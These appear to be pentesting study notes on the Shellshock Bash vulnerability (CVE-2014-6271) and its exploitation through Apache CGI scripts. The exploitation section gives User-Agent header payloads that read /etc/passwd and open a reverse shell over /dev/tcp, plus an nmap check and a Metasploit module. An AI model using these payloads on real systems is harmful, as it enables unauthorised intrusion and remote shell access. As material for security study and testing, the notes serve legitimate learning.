Shellshock (CVE-2014-6271)

Shellshock is a name given to a family of vulnerabilities in the Bash shell (since v1.3). It allows an attacker to remotely execute commands via Bash on the target system.

It is no longer a common vulnerability.

It is caused by a vulnerability in Bash, by which Bash mistakenly executes trailing commands after a series of characters: () { :; };.

In the contexts of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack.

CGI (Common Gateway Interface) scripts are used by Apache to execute arbitrary commands on the Linux system and its output is displayed to the client.

In order to exploit this vulnerability, an input vector or script that allows attackers to communicate with Bash is needed.

Any legitimate CGI script can be used in the context of an Apache web server.

Exploitation

Manual exploitation

User BurpSuite to exploit this vulnerability by inserting data to the User-Agent HTTP header.

# Check if the server is vulnerable to Shellshock vulnerability
nmap -sV TARGET_IP --script=http-shellshock --script-args="http-shellshock.uri=/PATH_TO_THE_CGI_FILE.cgi"

Open Burp and send the request to the CGI script to the repeater.

Modify the User-Agent to:

() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Obtain a reverse shell on the target:

# Listen on port 1234
nc -nvlp 1234

# Modify the User-Agent to
() { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/LOCAL_IP/LOCAL_PORT 0>&1'

Metasploit

use /exploit/multi/http/apache_mod_cgi_bash_env_exec

set RHOSTS TARGET_IP

set TARGETURI /CGI_SCRIPT